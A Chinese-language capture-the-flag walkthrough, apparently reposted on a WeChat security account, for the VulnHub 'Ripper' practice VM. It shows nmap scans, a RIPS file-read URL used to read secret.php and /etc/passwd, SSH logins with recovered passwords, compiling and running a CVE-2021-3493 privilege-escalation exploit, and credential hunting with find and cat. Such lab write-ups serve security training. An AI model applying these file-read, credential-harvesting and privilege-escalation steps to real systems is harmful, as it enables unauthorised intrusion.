声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/ripper/Ripper.ova
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现
端口扫描
WEB信息搜索
内部系统泄漏
代码审计
备份文件泄密
Webmin漏洞利用
Metasploit
CVE-2021-3493
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.139
nmap -p22,80,10000 -sV -A 192.168.144.138
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-03 01:13 EDT
Nmap scan report for 192.168.144.139
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
open http Apache httpd 2.4.29 ((Ubuntu))
open http MiniServ 1.910 (Webmin httpd)
MAC Address: 08:00:27:3A:BA:B6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1 IP address (1 host up) scanned in 43.01 seconds :
发现存在webmin
1.3 web信息收集
访问
https://192.168.144.139:10000
经过路径爬取
https://192.168.144.139:10000/robots.txt
得到这个页面
base64编码(密文) |
原文 |
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg== |
we scan php codes with rips |
经过分析,该靶机存在 rips 的应用,专门用来分析php源码
https://rips-scanner.sourceforge.net/
1.4 代码审计
访问
http://192.168.144.139/rips/
使用此应用来分析其代码分析
输入根目录点击scan进行扫描
发现文件泄露
/var/www/html/rips/windows/code.php
尝试访问该网址
http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/windows/code.php
可以读取该文件!
接下来指定关键字pass进行搜索
查看 /etc/passwd
http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/secret.php
查看得到账号ripper密码Gamespeopleplay
1.5 提权
1.5.1 CVE-2021-3493
ssh ripper@192.168.144.139 //密码为Gamespeopleplay
lsb_release -a
gcc -o exp exploit.c
scp exp ripper@192.168.144.139
./exp
根据操作系统版本推断出可以使用CVE-2021-3493来进行提权
ok提权成功
1.5.2 webmin日志
找到属主是cubes当前rippper可读的文件
find / -user cubes -type f -exec ls -la {} ; 2>/dev/null
cat /mnt/secret.file // 密码为 Il00tpeople
得到密码Il00tpeople
su cubes // 密码 Il00tpeople
find / -user cubes -type f -exec ls -la {} ; 2>/dev/null | grep -v "proc" | grep -v ".png"
找到日志miniser.log
从日志里面找到了账号admin密码tokiohotel登录webmin
进入 webmin
点击 others - command shell
ok拿到权限!
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Ripper靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论